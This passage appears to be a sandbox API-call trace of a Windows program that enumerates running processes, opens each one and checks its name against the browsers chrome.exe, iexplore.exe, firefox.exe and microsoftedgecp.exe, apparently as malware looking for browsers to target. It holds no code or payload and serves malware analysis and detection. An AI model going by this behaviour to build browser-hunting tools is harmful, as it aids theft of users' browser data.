	[0221.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5234
	[0221.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.929] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.930] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5238
	[0221.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x523c
	[0221.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.933] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.934] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.934] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.934] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5240
	[0221.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5244
	[0221.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.937] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.938] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.938] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.938] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0221.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5248
	[0221.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.939] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0221.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.940] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.940] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0221.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.940] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x524c
	[0221.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.946] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.946] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.947] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0221.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5250
	[0221.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.947] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5254
	[0221.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.950] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.950] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.951] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.951] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5258
	[0221.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.952] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.953] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.953] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x525c
	[0221.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.954] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.954] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.955] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.955] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0221.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5260
	[0221.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.956] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0221.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.957] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.957] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0221.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.957] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0221.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5264
	[0221.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.958] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.959] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.959] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.959] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0221.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5268
	[0221.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.960] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0221.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.961] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.961] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0221.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.961] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0221.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0221.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0221.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x526c
	[0221.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.963] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0221.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.964] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.964] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0221.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.965] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0221.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5270
	[0221.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.966] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0221.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.967] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.967] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0221.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.967] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.967] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0221.968] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5274
	[0221.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.968] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0221.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.969] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.969] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0221.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.970] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0221.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5278
	[0221.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.971] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0221.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.971] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.972] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0221.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.972] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0221.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x527c
	[0221.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.973] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0221.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.974] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.974] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0221.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.975] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0221.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5280
	[0221.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.976] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0221.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.977] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.977] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0221.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.977] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0221.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5284
	[0221.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.978] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0221.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.979] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.979] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0221.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.979] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.980] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0221.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5288
	[0221.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.981] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0221.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.981] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.982] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0221.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.982] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0221.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x528c
	[0221.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.984] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0221.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.984] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.984] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0221.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.985] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.985] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0221.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5290
	[0221.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.986] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0221.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.986] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.986] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0221.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.986] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0221.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5294
